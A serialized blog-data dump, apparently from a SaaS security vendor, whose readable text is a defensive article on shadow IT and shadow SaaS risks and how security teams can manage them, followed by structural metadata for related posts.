enhance productivity, or address specific needs.",[],{},{"nodeType":178,"data":287323,"content":287324},{},[287325],{"nodeType":173,"value":287326,"marks":287327,"data":287328},"This article specifically focuses on the SaaS applications portion of shadow IT, also known as “shadow SaaS.”",[],{},{"nodeType":169,"data":287330,"content":287331},{},[287332],{"nodeType":173,"value":287333,"marks":287334,"data":287335},"What is shadow SaaS?",[],{},{"nodeType":178,"data":287337,"content":287338},{},[287339],{"nodeType":173,"value":287340,"marks":287341,"data":287342},"Shadow SaaS is a subset of shadow IT, specifically focused on — you guessed it — SaaS apps. Shadow SaaS are the SaaS and cloud applications used within an organization without the explicit knowledge or approval of the company’s IT department. ",[],{},{"nodeType":178,"data":287344,"content":287345},{},[287346],{"nodeType":173,"value":287347,"marks":287348,"data":287349},"These unmanaged services and apps are added to the company’s attack surface when employees or teams subscribe to and use SaaS applications on their own, bypassing official IT procurement and security processes. ",[],{},{"nodeType":169,"data":287351,"content":287352},{},[287353],{"nodeType":173,"value":287354,"marks":287355,"data":287356},"What are the risks of shadow SaaS?",[],{},{"nodeType":312,"data":287358,"content":287362},{"target":287359},{"sys":287360},{"id":287361,"type":317,"linkType":318},"1WaBhoYHNKLEYTxjuCdhon",[],{"nodeType":235,"data":287364,"content":287365},{},[287366],{"nodeType":173,"value":287367,"marks":287368,"data":287369},"Bugs and vulnerabilities ",[],{},{"nodeType":178,"data":287371,"content":287372},{},[287373],{"nodeType":173,"value":287374,"marks":287375,"data":287376},"The SaaS applications and cloud services that fall under shadow IT don’t always go through proper security testing and assessments. ",[],{},{"nodeType":178,"data":287378,"content":287379},{},[287380],{"nodeType":173,"value":287381,"marks":287382,"data":287383},"Many may be bootstrapped tools or apps that are only managed by very small teams and startups who are primarily focused on adding product features, not security features.",[],{},{"nodeType":178,"data":287385,"content":287386},{},[287387],{"nodeType":173,"value":287388,"marks":287389,"data":287390},"That means some bugs and vulnerabilities may exist that attackers can exploit to gain access to the sensitive data stored within the app or to gain a foothold into your business by moving laterally through your attack surface.  ",[],{},{"nodeType":178,"data":287392,"content":287393},{},[287394],{"nodeType":173,"value":287395,"marks":287396,"data":287397},"There’s always a risk of bugs and vulnerabilities, but the risk is higher when the vendor isn’t investing in security.",[],{},{"nodeType":235,"data":287399,"content":287400},{},[287401],{"nodeType":173,"value":287402,"marks":287403,"data":287404},"Data loss and potential compliance violations ",[],{},{"nodeType":178,"data":287406,"content":287407},{},[287408],{"nodeType":173,"value":287409,"marks":287410,"data":287411},"The issue with shadow SaaS is that the security team has no knowledge that the platform or app is being used in the company, so they have no idea where company data is being stored. ",[],{},{"nodeType":178,"data":287413,"content":287414},{},[287415],{"nodeType":173,"value":287416,"marks":287417,"data":287418},"Without knowing which third-parties have access to company data, the security team aren’t aware what sensitive data could be exposed to attackers. Data leaks, supply chain, and third-party risks are the biggest security issues that result from shadow IT and shadow SaaS. ",[],{},{"nodeType":178,"data":287420,"content":287421},{},[287422],{"nodeType":173,"value":287423,"marks":287424,"data":287425},"When it comes to compliance,  you may find you’re not actually complying with data privacy regulations as well as you thought. More and more regulatory compliance standards are enforcing up-to-date SaaS application inventories along with their third-party supplier checklists these days.",[],{},{"nodeType":235,"data":287427,"content":287428},{},[287429],{"nodeType":173,"value":287430,"marks":287431,"data":287432},"Lack of support",[],{},{"nodeType":178,"data":287434,"content":287435},{},[287436],{"nodeType":173,"value":287437,"marks":287438,"data":287439},"When the IT team doesn’t know which SaaS apps the team is using, they can’t provide support with the tool, when needed. That leaves employees feeling stranded and frustrated as they struggle to troubleshoot on their own. This may even lead to employees being blocked on projects they’re relying on the SaaS app to help with.",[],{},{"nodeType":169,"data":287441,"content":287442},{},[287443],{"nodeType":173,"value":287444,"marks":287445,"data":287446},"How to manage shadow IT risks",[],{},{"nodeType":312,"data":287448,"content":287452},{"target":287449},{"sys":287450},{"id":287451,"type":317,"linkType":318},"4CSBmlPhd3rc74ohqIVX9N",[],{"nodeType":235,"data":287454,"content":287455},{},[287456],{"nodeType":173,"value":287457,"marks":287458,"data":287459},"Visibility ",[],{},{"nodeType":178,"data":287461,"content":287462},{},[287463,287467,287476],{"nodeType":173,"value":287464,"marks":287465,"data":287466},"To properly secure your data and that of your customers, you need to have visibility into all the SaaS applications employees are using, including free trials and apps they’re just testing. We’ve written ",[],{},{"nodeType":186,"data":287468,"content":287470},{"uri":287469},"https://pushsecurity.com/blog/free-and-trial-saas-applications-are-even-riskier-than-paid-apps/",[287471],{"nodeType":173,"value":287472,"marks":287473,"data":287475},"an article",[287474],{"type":194},{},{"nodeType":173,"value":287477,"marks":287478,"data":287479}," on how to manage the security challenges of freemium and trial apps that’s worth exploring further.",[],{},{"nodeType":178,"data":287481,"content":287482},{},[287483],{"nodeType":173,"value":287484,"marks":287485,"data":287486},"There are plenty of modern tools on the market that focus on discovering the SaaS applications and cloud services employees in your company are using. Most also have some level of risk-based data for the apps people are using, so you can make better security decisions about the shadow IT you uncover.",[],{},{"nodeType":235,"data":287488,"content":287489},{},[287490],{"nodeType":173,"value":287491,"marks":287492,"data":287493},"Consolidate shadow IT and cloud-based applications",[],{},{"nodeType":178,"data":287495,"content":287496},{},[287497],{"nodeType":173,"value":287498,"marks":287499,"data":287500},"Once security and IT teams know about and have an accurate inventory of all the SaaS apps in use (those previously considered “shadow IT” or “shadow SaaS”), they can encourage teams to consolidate their SaaS tools. ",[],{},{"nodeType":178,"data":287502,"content":287503},{},[287504],{"nodeType":173,"value":287505,"marks":287506,"data":287507},"For IT and Security, consolidating apps is a huge win because they can focus on making sure that short-list of tools is secure enough for them to continue to use them.",[],{},{"nodeType":178,"data":287509,"content":287510},{},[287511],{"nodeType":173,"value":287512,"marks":287513,"data":287514},"For the rest of the company, working within the same tools can aid in collaboration, clear communication and status for ongoing projects.",[],{},{"nodeType":178,"data":287516,"content":287517},{},[287518],{"nodeType":173,"value":287519,"marks":287520,"data":287521},"And, of course, Finance will love spending less money on a sea of disparate tools and consolidating the spend on the SaaS applications that are regularly used by the wider team.",[],{},{"nodeType":235,"data":287523,"content":287524},{},[287525],{"nodeType":173,"value":287526,"marks":287527,"data":287528},"Offer secure alternatives",[],{},{"nodeType":178,"data":287530,"content":287531},{},[287532],{"nodeType":173,"value":287533,"marks":287534,"data":287535},"To consolidate SaaS apps and rein in shadow IT, you’ll need to offer alternative solutions that will solve the problems employees have. Work with them to understand the use cases they’re solving with these apps, identify their requirements, and provide a few tools you’ve already vetted which still serve their needs but are more secure or have security features like SAML SSO so you can tuck them behind your existing SSO solution. ",[],{},{"nodeType":235,"data":287537,"content":287538},{},[287539],{"nodeType":173,"value":287540,"marks":287541,"data":287542},"Safely embrace shadow IT",[],{},{"nodeType":178,"data":287544,"content":287545},{},[287546,287550,287555],{"nodeType":173,"value":287547,"marks":287548,"data":287549},"We’re not suggesting that security and information technology teams throw their hands up and say “shadow IT will happen and we can’t control it,” but we ",[],{},{"nodeType":173,"value":287551,"marks":287552,"data":287554},"are ",[287553],{"type":1646},{},{"nodeType":173,"value":287556,"marks":287557,"data":287558},"suggesting that they consider a mindset that balances the needs of the team and their own need to control the security of sensitive information and the organization. ",[],{},{"nodeType":178,"data":287560,"content":287561},{},[287562,287566,287571],{"nodeType":173,"value":287563,"marks":287564,"data":287565},"New technologies exist that can help you uncover shadow IT so you can get involved in the software adoption process early on. This will give you the advantage of working with employees to understand why they’re using the tool ",[],{},{"nodeType":173,"value":287567,"marks":287568,"data":287570},"before they’ve fully adopted it",[287569],{"type":1646},{},{"nodeType":173,"value":287572,"marks":287573,"data":287574}," and become dependent on it. This will also give you more time to risk assess the app once it’s clear that the employee or team needs it. ",[],{},{"nodeType":178,"data":287576,"content":287577},{},[287578],{"nodeType":173,"value":287579,"marks":287580,"data":287581},"Some modern SaaS security solutions also help you enable security features like multi-factor authentication (MFA) and guide employees to use strong, unique passwords or social logins (“Login with your Google account” or “Login with Microsoft 365 account”), at the account level. These small, but powerful SaaS account security actions raise the bar for attackers, making it much harder for them to gain a foothold into your systems via an employee’s SaaS account.",[],{},{"nodeType":169,"data":287583,"content":287584},{},[287585],{"nodeType":173,"value":287586,"marks":287587,"data":287588},"This is a solvable problem",[],{},{"nodeType":178,"data":287590,"content":287591},{},[287592],{"nodeType":173,"value":287593,"marks":287594,"data":287595},"Shadow IT introduces security risks, sometimes serious security risks, but there’s no stopping it — even if Security goes the route of blocking access to SaaS apps that they haven’t yet approved or sanctioned employees will work around these security policies to gain access to the tools they need to do their jobs. ",[],{},{"nodeType":178,"data":287597,"content":287598},{},[287599],{"nodeType":173,"value":287600,"marks":287601,"data":287602},"The biggest reasons employees engage in this behavior is to streamline their work and, often, to collaborate with one another in a remote-work environment. Cloud apps enable these things really well, which is why they’re so popular.",[],{},{"nodeType":178,"data":287604,"content":287605},{},[287606],{"nodeType":173,"value":287607,"marks":287608,"data":287609},"But shadow IT doesn’t have to be a completely uncontrolled disaster, either. With visibility, security and IT teams can be a powerful ally for the business and a trusted partner for employees, rather than taking on the role of draconian authoritarian. Security teams no longer have to be the Department of No and, in fact, by changing this mindset, Security may find that they have more pull with business leaders within the company.",[],{},{"nodeType":178,"data":287611,"content":287612},{},[287613],{"nodeType":173,"value":287614,"marks":287615,"data":287616},"By working with employees, rather than against them, Security and IT become “enablers of the business,” which typically resonates with higher ups. If helping to streamline the cloud-based services the company uses doesn’t get them excited, saving the company money by consolidating tools certainly will.",[],{},{"nodeType":235,"data":287618,"content":287619},{},[287620],{"nodeType":173,"value":287621,"marks":287622,"data":287623},"Shadow IT is a visibility problem, not a technology one ",[],{},{"nodeType":178,"data":287625,"content":287626},{},[287627],{"nodeType":173,"value":287628,"marks":287629,"data":287630},"The issue with shadow IT isn’t that it exists, it’s that these SaaS apps exist outside of the IT department and security team’s remit — they just don’t know about them. By discovering the apps employees are using, they can integrate these SaaS apps safely into the company’s SaaS estate, alongside all the other tools in the tech stack.",[],{},{"nodeType":235,"data":287632,"content":287633},{},[287634],{"nodeType":173,"value":287635,"marks":287636,"data":287637},"Shift IT department and security team mindsets to make an impact",[],{},{"nodeType":178,"data":287639,"content":287640},{},[287641],{"nodeType":173,"value":287642,"marks":287643,"data":287644},"Security and IT need to be approachable and transparent with employees as the first step, rather than shaming them for their behavior. They’re not gleefully going behind the information technology team’s back for fun, they’re trying to get their work done quickly. ",[],{},{"nodeType":178,"data":287646,"content":287647},{},[287648],{"nodeType":173,"value":287649,"marks":287650,"data":287651},"Asking employees to shift from hiding these SaaS apps from you to being transparent that they’re using them requires a level of mutual trust and respect.  ",[],{},{"nodeType":235,"data":287653,"content":287654},{},[287655],{"nodeType":173,"value":287656,"marks":287657,"data":287658},"Become a partner to improve security",[],{},{"nodeType":178,"data":287660,"content":287661},{},[287662],{"nodeType":173,"value":287663,"marks":287664,"data":287665},"You will, of course, still have some SaaS apps that are outright not approved because they’re too high-risk for the company’s security policies and, in that case, you’ll want to offer one of those safer alternatives that we mentioned above and offer that as a replacement to users who were using the risky, unsafe tool. ",[],{},{"nodeType":178,"data":287667,"content":287668},{},[287669],{"nodeType":173,"value":287670,"marks":287671,"data":287672},"This is much easier to do when you’re seen as a collaborative, friendly team that’s doing the best thing for the company than when you’re the enforcer of rules and policies, which restrict them at every turn. ",[],{},{"nodeType":178,"data":287674,"content":287675},{},[287676],{"nodeType":173,"value":287677,"marks":287678,"data":287679},"Building a strong relationship with employees (or repairing the relationship if you’ve previously been seen as the Department of No), takes work and a major shift in the security team’s mindset, but the ramifications are far reaching. By considering how employees feel about the security team and IT department’s decisions, both teams win. The end result should never be that employees make security decisions, however their needs for getting their jobs done needs to be considered as security measures are put in place.",[],{},{"nodeType":178,"data":287681,"content":287682},{},[287683,287687,287696],{"nodeType":173,"value":287684,"marks":287685,"data":287686},"The National Cyber Security Centre (NCSC) posted ",[],{},{"nodeType":186,"data":287688,"content":287690},{"uri":287689},"https://www.ncsc.gov.uk/guidance/shadow-it#:~:text=Avoid%20unnecessary%20lockdowns%20of%20enterprise%20IT",[287691],{"nodeType":173,"value":287692,"marks":287693,"data":287695},"a great article",[287694],{"type":194},{},{"nodeType":173,"value":287697,"marks":287698,"data":287699}," on this topic if you’d like to explore further.",[],{},"Understanding Shadow IT and Shadow SaaS: Definition, security risks, and how to manage it","We’ll define shadow IT, talk through the security risks associated with it and give some actionable guidance on how to manage it.\n","2023-08-30T00:00:00.000Z","understanding-shadow-it",{"items":287705},[287706,287708],{"sys":287707,"name":274157},{"id":274156},{"sys":287709,"name":26133},{"id":26132},{"items":287711},[287712],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":287713},{"url":273636},{"items":287715},[287716],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":287717},{"url":274167},{"json":287719,"links":288156},{"nodeType":165,"data":287720,"content":287721},{},[287722,287728,287734,287740,287746,287752,287772,287782,287800,287806,287812,287825,287831,287837,287843,287849,287855,287861,287866,287872,287940,287946,287951,287957,287963,287980,287986,287992,288013,288031,288037,288043,288073,288078,288084,288102,288108,288114,288132,288138,288144,288150],{"nodeType":169,"data":287723,"content":287724},{},[287725],{"nodeType":173,"value":258287,"marks":287726,"data":287727},[],{},{"nodeType":178,"data":287729,"content":287730},{},[287731],{"nodeType":173,"value":273654,"marks":287732,"data":287733},[],{},{"nodeType":178,"data":287735,"content":287736},{},[287737],{"nodeType":173,"value":273661,"marks":287738,"data":287739},[],{},{"nodeType":235,"data":287741,"content":287742},{},[287743],{"nodeType":173,"value":273668,"marks":287744,"data":287745},[],{},{"nodeType":178,"data":287747,"content":287748},{},[287749],{"nodeType":173,"value":273675,"marks":287750,"data":287751},[],{},{"nodeType":178,"data":287753,"content":287754},{},[287755,287758,287762,287765,287769],{"nodeType":173,"value":273682,"marks":287756,"data":287757},[],{},{"nodeType":173,"value":273686,"marks":287759,"data":287761},[287760],{"type":1646},{},{"nodeType":173,"value":273691,"marks":287763,"data":287764},[],{},{"nodeType":173,"value":273695,"marks":287766,"data":287768},[287767],{"type":1646},{},{"nodeType":173,"value":273700,"marks":287770,"data":287771},[],{},{"nodeType":178,"data":287773,"content":287774},{},[287775,287779],{"nodeType":173,"value":273707,"marks":287776,"data":287778},[287777],{"type":1646},{},{"nodeType":173,"value":273712,"marks":287780,"data":287781},[],{},{"nodeType":178,"data":287783,"content":287784},{},[287785,287788,287797],{"nodeType":173,"value":273719,"marks":287786,"data":287787},[],{},{"nodeType":1698,"data":287789,"content":287792},{"target":287790},{"sys":287791},{"id":273726,"type":317,"linkType":318},[287793],{"nodeType":173,"value":273729,"marks":287794,"data":287796},[287795],{"type":194},{},{"nodeType":173,"value":273734,"marks":287798,"data":287799},[],{},{"nodeType":178,"data":287801,"content":287802},{},[287803],{"nodeType":173,"value":273741,"marks":287804,"data":287805},[],{},{"nodeType":169,"data":287807,"content":287808},{},[287809],{"nodeType":173,"value":273748,"marks":287810,"data":287811},[],{},{"nodeType":178,"data":287813,"content":287814},{},[287815,287818,287822],{"nodeType":173,"value":273755,"marks":287816,"data":287817},[],{},{"nodeType":173,"value":3107,"marks":287819,"data":287821},[287820],{"type":370},{},{"nodeType":173,"value":273763,"marks":287823,"data":287824},[],{},{"nodeType":178,"data":287826,"content":287827},{},[287828],{"nodeType":173,"value":273770,"marks":287829,"data":287830},[],{},{"nodeType":235,"data":287832,"content":287833},{},[287834],{"nodeType":173,"value":273777,"marks":287835,"data":287836},[],{},{"nodeType":178,"data":287838,"content":287839},{},[287840],{"nodeType":173,"value":273784,"marks":287841,"data":287842},[],{},{"nodeType":178,"data":287844,"content":287845},{},[287846],{"nodeType":173,"value":273791,"marks":287847,"data":287848},[],{},{"nodeType":169,"data":287850,"content":287851},{},[287852],{"nodeType":173,"value":273798,"marks":287853,"data":287854},[],{},{"nodeType":178,"data":287856,"content":287857},{},[287858],{"nodeType":173,"value":273805,"marks":287859,"data":287860},[],{},{"nodeType":312,"data":287862,"content":287865},{"target":287863},{"sys":287864},{"id":273812,"type":317,"linkType":318},[],{"nodeType":178,"data":287867,"content":287868},{},[287869],{"nodeType":173,"value":273818,"marks":287870,"data":287871},[],{},{"nodeType":250,"data":287873,"content":287874},{},[287875,287888,287901,287914,287927],{"nodeType":254,"data":287876,"content":287877},{},[287878],{"nodeType":178,"data":287879,"content":287880},{},[287881,287885],{"nodeType":173,"value":273831,"marks":287882,"data":287884},[287883],{"type":370},{},{"nodeType":173,"value":273836,"marks":287886,"data":287887},[],{},{"nodeType":254,"data":287889,"content":287890},{},[287891],{"nodeType":178,"data":287892,"content":287893},{},[287894,287898],{"nodeType":173,"value":273846,"marks":287895,"data":287897},[287896],{"type":370},{},{"nodeType":173,"value":273851,"marks":287899,"data":287900},[],{},{"nodeType":254,"data":287902,"content":287903},{},[287904],{"nodeType":178,"data":287905,"content":287906},{},[287907,287911],{"nodeType":173,"value":273861,"marks":287908,"data":287910},[287909],{"type":370},{},{"nodeType":173,"value":273866,"marks":287912,"data":287913},[],{},{"nodeType":254,"data":287915,"content":287916},{},[287917],{"nodeType":178,"data":287918,"content":287919},{},[287920,287924],{"nodeType":173,"value":273876,"marks":287921,"data":287923},[287922],{"type":370},{},{"nodeType":173,"value":273881,"marks":287925,"data":287926},[],{},{"nodeType":254,"data":287928,"content":287929},{},[287930],{"nodeType":178,"data":287931,"content":287932},{},[287933,287937],{"nodeType":173,"value":273891,"marks":287934,"data":287936},[287935],{"type":370},{},{"nodeType":173,"value":273896,"marks":287938,"data":287939},[],{},{"nodeType":169,"data":287941,"content":287942},{},[287943],{"nodeType":173,"value":273903,"marks":287944,"data":287945},[],{},{"nodeType":312,"data":287947,"content":287950},{"target":287948},{"sys":287949},{"id":273910,"type":317,"linkType":318},[],{"nodeType":235,"data":287952,"content":287953},{},[287954],{"nodeType":173,"value":273916,"marks":287955,"data":287956},[],{},{"nodeType":178,"data":287958,"content":287959},{},[287960],{"nodeType":173,"value":273923,"marks":287961,"data":287962},[],{},{"nodeType":178,"data":287964,"content":287965},{},[287966,287969,287977],{"nodeType":173,"value":273930,"marks":287967,"data":287968},[],{},{"nodeType":1698,"data":287970,"content":287973},{"target":287971},{"sys":287972},{"id":273937,"type":317,"linkType":318},[287974],{"nodeType":173,"value":273940,"marks":287975,"data":287976},[],{},{"nodeType":173,"value":273944,"marks":287978,"data":287979},[],{},{"nodeType":235,"data":287981,"content":287982},{},[287983],{"nodeType":173,"value":273951,"marks":287984,"data":287985},[],{},{"nodeType":178,"data":287987,"content":287988},{},[287989],{"nodeType":173,"value":273958,"marks":287990,"data":287991},[],{},{"nodeType":250,"data":287993,"content":287994},{},[287995,288004],{"nodeType":254,"data":287996,"content":287997},{},[287998],{"nodeType":178,"data":287999,"content":288000},{},[288001],{"nodeType":173,"value":273971,"marks":288002,"data":288003},[],{},{"nodeType":254,"data":288005,"content":288006},{},[288007],{"nodeType":178,"data":288008,"content":288009},{},[288010],{"nodeType":173,"value":273981,"marks":288011,"data":288012},[],{},{"nodeType":178,"data":288014,"content":288015},{},[288016,288019,288028],{"nodeType":173,"value":273988,"marks":288017,"data":288018},[],{},{"nodeType":1698,"data":288020,"content":288023},{"target":288021},{"sys":288022},{"id":273995,"type":317,"linkType":318},[288024],{"nodeType":173,"value":28052,"marks":288025,"data":288027},[288026],{"type":194},{},{"nodeType":173,"value":274002,"marks":288029,"data":288030},[],{},{"nodeType":235,"data":288032,"content":288033},{},[288034],{"nodeType":173,"value":274009,"marks":288035,"data":288036},[],{},{"nodeType":178,"data":288038,"content":288039},{},[288040],{"nodeType":173,"value":274016,"marks":288041,"data":288042},[],{},{"nodeType":250,"data":288044,"content":288045},{},[288046,288055,288064],{"nodeType":254,"data":288047,"content":288048},{},[288049],{"nodeType":178,"data":288050,"content":288051},{},[288052],{"nodeType":173,"value":274029,"marks":288053,"data":288054},[],{},{"nodeType":254,"data":288056,"content":288057},{},[288058],{"nodeType":178,"data":288059,"content":288060},{},[288061],{"nodeType":173,"value":274039,"marks":288062,"data":288063},[],{},{"nodeType":254,"data":288065,"content":288066},{},[288067],{"nodeType":178,"data":288068,"content":288069},{},[288070],{"nodeType":173,"value":274049,"marks":288071,"data":288072},[],{},{"nodeType":312,"data":288074,"content":288077},{"target":288075},{"sys":288076},{"id":274056,"type":317,"linkType":318},[],{"nodeType":235,"data":288079,"content":288080},{},[288081],{"nodeType":173,"value":274062,"marks":288082,"data":288083},[],{},{"nodeType":178,"data":288085,"content":288086},{},[288087,288090,288099],{"nodeType":173,"value":274069,"marks":288088,"data":288089},[],{},{"nodeType":1698,"data":288091,"content":288094},{"target":288092},{"sys":288093},{"id":273937,"type":317,"linkType":318},[288095],{"nodeType":173,"value":274078,"marks":288096,"data":288098},[288097],{"type":194},{},{"nodeType":173,"value":60235,"marks":288100,"data":288101},[],{},{"nodeType":178,"data":288103,"content":288104},{},[288105],{"nodeType":173,"value":274089,"marks":288106,"data":288107},[],{},{"nodeType":235,"data":288109,"content":288110},{},[288111],{"nodeType":173,"value":274096,"marks":288112,"data":288113},[],{},{"nodeType":178,"data":288115,"content":288116},{},[288117,288120,288129],{"nodeType":173,"value":274103,"marks":288118,"data":288119},[],{},{"nodeType":1698,"data":288121,"content":288124},{"target":288122},{"sys":288123},{"id":274110,"type":317,"linkType":318},[288125],{"nodeType":173,"value":274113,"marks":288126,"data":288128},[288127],{"type":194},{},{"nodeType":173,"value":274118,"marks":288130,"data":288131},[],{},{"nodeType":169,"data":288133,"content":288134},{},[288135],{"nodeType":173,"value":40632,"marks":288136,"data":288137},[],{},{"nodeType":178,"data":288139,"content":288140},{},[288141],{"nodeType":173,"value":274131,"marks":288142,"data":288143},[],{},{"nodeType":178,"data":288145,"content":288146},{},[288147],{"nodeType":173,"value":274138,"marks":288148,"data":288149},[],{},{"nodeType":178,"data":288151,"content":288152},{},[288153],{"nodeType":173,"value":274145,"marks":288154,"data":288155},[],{},{"entries":288157},{"inline":288158,"hyperlink":288159,"block":288170},[],[288160,288162,288164,288166],{"sys":288161,"__typename":1528,"title":284281,"slug":284284},{"id":273726},{"sys":288163,"__typename":1528,"title":286444,"slug":286445},{"id":273937},{"sys":288165,"__typename":1528,"title":284931,"slug":284932},{"id":273995},{"sys":288167,"__typename":1528,"title":288168,"slug":288169},{"id":274110},"How to kick off an incident response investigation for a compromised SaaS account","how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas",[288171,288178,288186],{"sys":288172,"__typename":5345,"title":288173,"caption":288174,"layoutMode":118,"file":288175},{"id":273812},"Shadow identity risks","The risks of shadow identities",{"url":288176,"width":288177,"height":226783},"https://images.ctfassets.net/y1cdw1ablpvd/5xapR3DnQgRa58qpgKEkNN/57c124664fa57d8576f945e4be931707/image1.png",1590,{"sys":288179,"__typename":5345,"title":288180,"caption":288181,"layoutMode":118,"file":288182},{"id":273910},"Manage shadow identity risks","Guidance for managing the risks shadow identities present",{"url":288183,"width":288184,"height":288185},"https://images.ctfassets.net/y1cdw1ablpvd/3Cdux9BCTCgDMVVyBqGyXM/f72f4c7f0a05f19b094999a3db860cea/image2.png",1588,892,{"sys":288187,"__typename":5345,"title":288188,"caption":288189,"layoutMode":118,"file":288190},{"id":274056},"Password reuse chatops","In Push, admins can push out notifications to employees via Slack or Teams with easily understandable, non-technical instructions to improve the security of their account",{"url":288191,"width":32171,"height":288192},"https://images.ctfassets.net/y1cdw1ablpvd/1aMdatiFBkOodiOPMLIu3J/81b92634084bef4e02c75e00b6dcedf7/image3.png",921,"content:blog:what-are-shadow-identities.json","blog/what-are-shadow-identities.json","blog/what-are-shadow-identities",{"_path":288197,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":288198,"ogImage":118,"summary":288200,"title":268752,"subtitle":118,"metaTitle":288211,"synopsis":267888,"hashTags":118,"publishedDate":268753,"slug":268754,"tagsCollection":288212,"relatedBlogPostsCollection":288218,"authorsCollection":289744,"content":289748,"_id":290636,"_type":5439,"_source":5440,"_file":290637,"_stem":290638,"_extension":5439},"/blog/nearly-invisible-attack-chain",{"id":267879,"publishedAt":288199},"2024-10-01T13:26:05.713Z",{"json":288201},{"data":288202,"content":288203,"nodeType":165},{},[288204],{"data":288205,"content":288206,"nodeType":178},{},[288207],{"data":288208,"marks":288209,"value":288210,"nodeType":173},{},[],"We’re going to demonstrate how combining two of our favorite new SaaS attack techniques - from our SaaS Attacks Matrix research - makes a simple, but very stealthy approach that maintains persistent access.","SaaS attack matrix: The shadow workflow’s evil twin",{"items":288213},[288214,288216],{"sys":288215,"name":505},{"id":504},{"sys":288217,"name":509},{"id":508},{"items":288219},[288220,288626,289301],{"__typename":1528,"sys":288221,"content":288222,"title":252406,"synopsis":259904,"hashTags":118,"publishedDate":259905,"slug":252407,"tagsCollection":288616,"authorsCollection":288622},{"id":228244},{"json":288223},{"data":288224,"content":288225,"nodeType":165},{},[288226,288242,288248,288254,288260,288276,288282,288298,288304,288310,288316,288322,288328,288334,288340,288356,288362,288368,288373,288379,288385,288391,288396,288401,288406,288412,288418,288423,288429,288435,288441,288446,288452,288458,288464,288470,288476,288481,288487,288493,288498,288504,288510,288515,288521,288527,288586,288592,288598,288604,288610],{"data":288227,"content":288228,"nodeType":178},{},[288229,288232,288239],{"data":288230,"marks":288231,"value":259462,"nodeType":173},{},[],{"data":288233,"content":288234,"nodeType":186},{"uri":88239},[288235],{"data":288236,"marks":288237,"value":88742,"nodeType":173},{},[288238],{"type":194},{"data":288240,"marks":288241,"value":259473,"nodeType":173},{},[],{"data":288243,"content":288244,"nodeType":178},{},[288245],{"data":288246,"marks":288247,"value":259480,"nodeType":173},{},[],{"data":288249,"content":288250,"nodeType":178},{},[288251],{"data":288252,"marks":288253,"value":259487,"nodeType":173},{},[],{"data":288255,"content":288256,"nodeType":169},{},[288257],{"data":288258,"marks":288259,"value":227960,"nodeType":173},{},[],{"data":288261,"content":288262,"nodeType":178},{},[288263,288266,288273],{"data":288264,"marks":288265,"value":37,"nodeType":173},{},[],{"data":288267,"content":288268,"nodeType":186},{"uri":208521},[288269],{"data":288270,"marks":288271,"value":227973,"nodeType":173},{},[288272],{"type":194},{"data":288274,"marks":288275,"value":227977,"nodeType":173},{},[],{"data":288277,"content":288278,"nodeType":169},{},[288279],{"data":288280,"marks":288281,"value":259516,"nodeType":173},{},[],{"data":288283,"content":288284,"nodeType":178},{},[288285,288288,288295],{"data":288286,"marks":288287,"value":37,"nodeType":173},{},[],{"data":288289,"content":288290,"nodeType":186},{"uri":63250},[288291],{"data":288292,"marks":288293,"value":63256,"nodeType":173},{},[288294],{"type":194},{"data":288296,"marks":288297,"value":259533,"nodeType":173},{},[],{"data":288299,"content":288300,"nodeType":169},{},[288301],{"data":288302,"marks":288303,"value":259540,"nodeType":173},{},[],{"data":288305,"content":288306,"nodeType":178},{},[288307],{"data":288308,"marks":288309,"value":259547,"nodeType":173},{},[],{"data":288311,"content":288312,"nodeType":178},{},[288313],{"data":288314,"marks":288315,"value":259554,"nodeType":173},{},[],{"data":288317,"content":288318,"nodeType":178},{},[288319],{"data":288320,"marks":288321,"value":259561,"nodeType":173},{},[],{"data":288323,"content":288324,"nodeType":178},{},[288325],{"data":288326,"marks":288327,"value":259568,"nodeType":173},{},[],{"data":288329,"content":288330,"nodeType":178},{},[288331],{"data":288332,"marks":288333,"value":259575,"nodeType":173},{},[],{"data":288335,"content":288336,"nodeType":169},{},[288337],{"data":288338,"marks":288339,"value":259582,"nodeType":173},{},[],{"data":288341,"content":288342,"nodeType":178},{},[288343,288346,288353],{"data":288344,"marks":288345,"value":259589,"nodeType":173},{},[],{"data":288347,"content":288348,"nodeType":186},{"uri":259592},[288349],{"data":288350,"marks":288351,"value":259598,"nodeType":173},{},[288352],{"type":194},{"data":288354,"marks":288355,"value":259602,"nodeType":173},{},[],{"data":288357,"content":288358,"nodeType":178},{},[288359],{"data":288360,"marks":288361,"value":259609,"nodeType":173},{},[],{"data":288363,"content":288364,"nodeType":178},{},[288365],{"data":288366,"marks":288367,"value":259616,"nodeType":173},{},[],{"data":288369,"content":288372,"nodeType":312},{"target":288370},{"sys":288371},{"id":259621,"type":317,"linkType":318},[],{"data":288374,"content":288375,"nodeType":178},{},[288376],{"data":288377,"marks":288378,"value":259629,"nodeType":173},{},[],{"data":288380,"content":288381,"nodeType":235},{},[288382],{"data":288383,"marks":288384,"value":259636,"nodeType":173},{},[],{"data":288386,"content":288387,"nodeType":178},{},[288388],{"data":288389,"marks":288390,"value":259643,"nodeType":173},{},[],{"data":288392,"content":288395,"nodeType":312},{"target":288393},{"sys":288394},{"id":259648,"type":317,"linkType":318},[],{"data":288397,"content":288400,"nodeType":312},{"target":288398},{"sys":288399},{"id":259654,"type":317,"linkType":318},[],{"data":288402,"content":288405,"nodeType":312},{"target":288403},{"sys":288404},{"id":259660,"type":317,"linkType":318},[],{"data":288407,"content":288408,"nodeType":235},{},[288409],{"data":288410,"marks":288411,"value":259668,"nodeType":173},{},[],{"data":288413,"content":288414,"nodeType":178},{},[288415],{"data":288416,"marks":288417,"value":259675,"nodeType":173},{},[],{"data":288419,"content":288422,"nodeType":312},{"target":288420},{"sys":288421},{"id":259680,"type":317,"linkType":318},[],{"data":288424,"content":288425,"nodeType":235},{},[288426],{"data":288427,"marks":288428,"value":259688,"nodeType":173},{},[],{"data":288430,"content":288431,"nodeType":178},{},[288432],{"data":288433,"marks":288434,"value":259695,"nodeType":173},{},[],{"data":288436,"content":288437,"nodeType":178},{},[288438],{"data":288439,"marks":288440,"value":259702,"nodeType":173},{},[],{"data":288442,"content":288445,"nodeType":312},{"target":288443},{"sys":288444},{"id":259707,"type":317,"linkType":318},[],{"data":288447,"content":288448,"nodeType":178},{},[288449],{"data":288450,"marks":288451,"value":259715,"nodeType":173},{},[],{"data":288453,"content":288454,"nodeType":169},{},[288455],{"data":288456,"marks":288457,"value":259722,"